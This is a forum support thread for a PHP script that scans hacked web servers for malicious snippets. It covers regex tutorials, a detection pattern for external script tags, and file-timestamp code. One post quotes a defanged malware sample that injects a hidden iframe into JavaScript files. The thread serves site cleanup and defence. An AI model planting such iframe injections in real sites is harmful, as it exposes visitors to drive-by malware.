Support thread for "lookforbadguys" PHP script to find malicious text in files

[SteveW]

I've created this thread for bug reports, feature suggestions, other feedback, or questions about the "lookforbadguys.php" script at "PHP script to find malicious code on a hacked server".

You can start a new message thread, if you prefer.

The idea for a support thread was inspired by a helpful question that has already been asked by someone in a separate thread:

Exclude a folder, bad guy php script  
It discusses the use of regular expressions to exclude files by filename, partial path+filename, or full and unambiguous path+filename.

The brief "notes about regular expressions" in this post might be helpful if you are very new to the use of regular expressions.

Because the lookforbadguys script achieves much of its flexibility through the use of regular expressions, you might find the following resources helpful:

Regex Tutorials

Try starting here
http://www.phpfreaks.com/tutorial/regular-expressions-part1---basic-syntax

Also this popular page for another approach to the basics
http://gnosis.cx/publish/programming/regular_expressions.html

These next two resources are the regex tutorials for Perl. Although the Perl-specific code doesn't apply to PHP, the regex examples and walkthroughs are relevant and readable, and nearly the same as you use in PHP:

Quick tutorial: http://perldoc.perl.org/perlrequick.html
Longer tutorial: http://perldoc.perl.org/perlretut.html

Regex Reference Manuals

The text file http://www.pcre.org/pcre.txt (their home page is http://www.pcre.org) is the definitive and truly excellent reference to Perl Compatible Regular Expressions (it is the manpage for them). Skip the top half of the file and go to the section called PCREPATTERN. Although not a tutorial, it has lots of instructive examples.

This is the PCRE reference at php.net. It's rather formal and easiest to understand if you already know the material: http://us.php.net/manual/en/reference.pcre.pattern.syntax.php

[isd.jouie]

hi! can you help me with these? im not a programmer and i dont know about msql. my was hacked and all of my addon sites are compromised. i dont know what to do.  i tried using your lookforbadguys.php in my site. but i dont know what to do after that. here is the result after i ran the program..

hope you can help me please...

[SteveW]

Hello,

The first time you run the script (with the default settings), it shows you the snippets it thinks might be suspicious, and in what files it found them. You need to use your own judgment about the text that is displayed (combined with your knowledge of what text your pages normally contain) to decide whether each snippet actually is malicious or not. 

For each snippet that actually is malicious, open each file in a text editor and remove the code that the hacker put there. Use "code view" (HTML) to do that. Don't use a WYSIWYG editor.

There are some other things that are worth searching for in your files. They aren't included in the script's default settings because the things to search for are different for every site:

In the page at http://25yearsofprogramming.com/blog/2009/20091124.htm are instructions for how to get the Google Safe Browsing Diagnostic Report for your website. If your site is flagged there for malware and the report mentions malicious domains (websites) or IP addresses, create some new regular expression entries in the lookforbadguys script (in the $SuspiciousSnippets array) so the script can search your site for references to those domains or IP addresses. 

Then, even if your site is not flagged for malware, you can go to http://www.unmaskparasites.com/ and get a report of the websites from which your pages get external content. If any of those are suspicious (that is, you don't think your website should be pulling content from those sites, so the hacker probably put those references there), add regular expression entries in the $SuspiciousSnippets array for those, too, so the script can search for them, as well. 

That's basically it. The lookforbadguys script helps you find text that shouldn't be in your files, but it can't know for sure exactly what is suspicious and what's not. For you to make that decision, it usually requires you to examine the snippet and think about it. 

[wilson]

Thought I'd put this here to see if anyone recognized it. This comes up over and over when I run lookforbadguys. Thing is, I don't have analytics or amazon on the page - I've been removing both (analytics/amazon) code and I believe I've eliminated 99% from sites pages. Figure there might be something somewhere I missed but ... ? Anyway, maybe somebody knows exactly what this script/result represents. Thanks

Code:

@<script[^>]+src=[\x22\x27]?http://(?!(www\.(google-analytics|gmodules)\.com|pagead2\.googlesyndication\.com/pagead/|(ws\.|((www|cls)\.assoc-))amazon\.com/))[^>]*>@i

[SteveW]

Hello wilson,

That regular expression identifies any externally-sourced script (usually JavaScript) in your page that comes from someplace other than google or amazon. Scripts from google or amazon are assumed safe.

Apparently, your page has a script in it with this tag:

<script src=http://example.com/path/filename.js>

and example.com is not google or amazon.

If example.com is not your site and it's not a site that you intentionally load a script from, that snippet is suspicious and could have been injected into your page by a hack.

The text you posted, from the lefthand side of the report page, is showing you the regular expression that was matched. On the righthand side of the page should be the suspicious snippet. Examine the suspicious snippet on the righthand side to see what site "example.com" really is. Determine if it's a snippet that you intentionally put in your page, or if it was placed there maliciously by somebody else.

[wilson]

Okay, so the "!" is an - if not.

Can I increase the number of characters for output? If so what line? I see output color but not #. Some script addresses (black text color) are cut off before end tag. Thanks

[SteveW]

Okay, so the "!" is an - if not.

Yes, right - the (?!  ) expression means "not followed by".

Can I increase the number of characters for output?

At about line 425 are these lines:

# THE 80 CHARACTERS AFTER START OF MATCH INSTANCE
$s = substr($file, $occurrence[1], 80);

You can change the 80 to a larger number to capture and output more characters after the start of the match.

[wilson]

Perfect, thanks

[tarlachmoorhouse]

I've been using the script to clean out a hacked joomla site, and I'm wondering if it would make sense and be possible to add a date range option in the file selection so that if you know when a hack occurred you could use it to look specifically at file changed from the date of the attack onwards, and / or be able to exclude files edited after a specific date, ie excluding ones you know you have replaced / corrected during the clean up process. ?

Thanks

John

[SteveW]

John, thank you for your suggestion. I can see that the information would sometimes be useful, but to make it a built-in feature would make this already complicated script even harder to use.

Finding files modified within a range of dates/times could be quite useful (and I'll deal with it below), but it's not directly related to whether the files actually do contain suspicious snippets, which would already be caught by the searches that the script currently does.

Excluding files that you have already edited isn't necessarily as safe as it sounds, because the files could have been re-hacked since you edited them. If they're really clean, they shouldn't be listed in a new suspicious snippets search (except for any false positives), so they shouldn't have to be excluded.

----

But it is possible to add file timestamp checking into the PHP code. One place you could do it is in the BuildFileList() function, to make a file be either excluded or included based on its timestamp. Or you could create a whole new section of the script that first uses the current BuildFileList() to build the file list normally, and then output a report based on the timestamps of the files.

Although I don't want to add the feature to the default version of the script, I have created the following example code that shows usage of the key PHP functions that you'd probably need for adding a timestamp checking feature to your copy of the script. This code outputs a message if the file's timestamp falls within the "suspicious" range:

# You must either set this explicitly or endure PHP warnings about it.
# Make sure the timezone you specify IS the one the server is using for file timestamps.

date_default_timezone_set('America/Los_Angeles');

# Use exactly this format for your timestamps because
# it is the same format used below in the date() function.

$TimeRangeStart = "2012-04-01 05:00:00";
$TimeRangeEnd   = "2012-04-06 19:30:00";

# You'd normally get the filename from a list...
$filename = 'test.php';

$lastmod = date("Y-m-d H:i:s", filemtime($filename)); 
if(($lastmod >= $TimeRangeStart) && ($lastmod <= $TimeRangeEnd))
{

echo "Suspicious timestamp: $lastmod " . realpath($filename) . "\n";

# AN ALTERNATIVE, FILENAME ONLY.

#echo "Suspicious timestamp: $lastmod $filename\n"; 

# OR, IF IT IS FOR OUTPUT ON WEB PAGE, CLEAN AND COLORIZE THE TEXT:

#echo CleanColorText("Suspicious timestamp: $lastmod ", 'red') . CleanColorText(realpath($filename), 'black');

}

----

On a linux server, it's also possible to use linux commands directly to find files modified within a certain time range, and it's possible to use PHP to launch those commands and display the result. The key is the linux "find" command, described in detail at http://linux.die.net/man/1/find

This is an example of some prototype code, but I can't really recommend using find or using PHP shell_exec unless you're comfortable with them already. Nonetheless, it is an available method for those who want to do some exploring, studying, and experimenting:

# FIND REGULAR FILES MODIFIED WITHIN THE PAST 10 DAYS
$cmd = 'find ./ -type f -mtime -10';

$result = shell_exec($cmd);

# CLEAN RESULT FOR OUTPUT ON WEB PAGE
$echo htmlentities($result, ENT_QUOTES);

[SteveW]

On further reflection and with a fresh start on a new day, I found a way to report useful timestamp information without making all users go through the hassle of defining a timeframe to report on even if they don't have one in mind or aren't interested in a report on that information.

This morning, I published a new version of lookforbadguys with these added features:

1) Wherever a filename is listed on a line (in all the reports), its timestamp is also displayed.  

2) There's a new search routine to find all files that were modified within a user-defined time period of interest. You set the starting and ending dates/times in the User Configuration section. If the user hasn't configured starting and ending dates different from the defaults, the script simply skips the time window search.

Thank you for your suggestions.

[malikhemani]

Hello Steve, thank you for all the info on website security. However, recently our entire hosting account was hacked with a link of code inside each one of the .js files. We have close to 1000 .js files bc of multiple Joomla and WP installs. How can we modify the handler inside LookingForBadGuys to remove the below code? Your help is much appreciated.

document.write('<iframe src="hxxp://spottystomach.net/Softgoods?8" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');

Thanks

[Reason for edit: hxxp to deactivate link]

[SteveW]

I would suggest hiring a PHP programmer or web designer who is good at PHP to do this for you.
I am not available at this time to help with this type of problem.
The key PHP function you will need is preg_replace.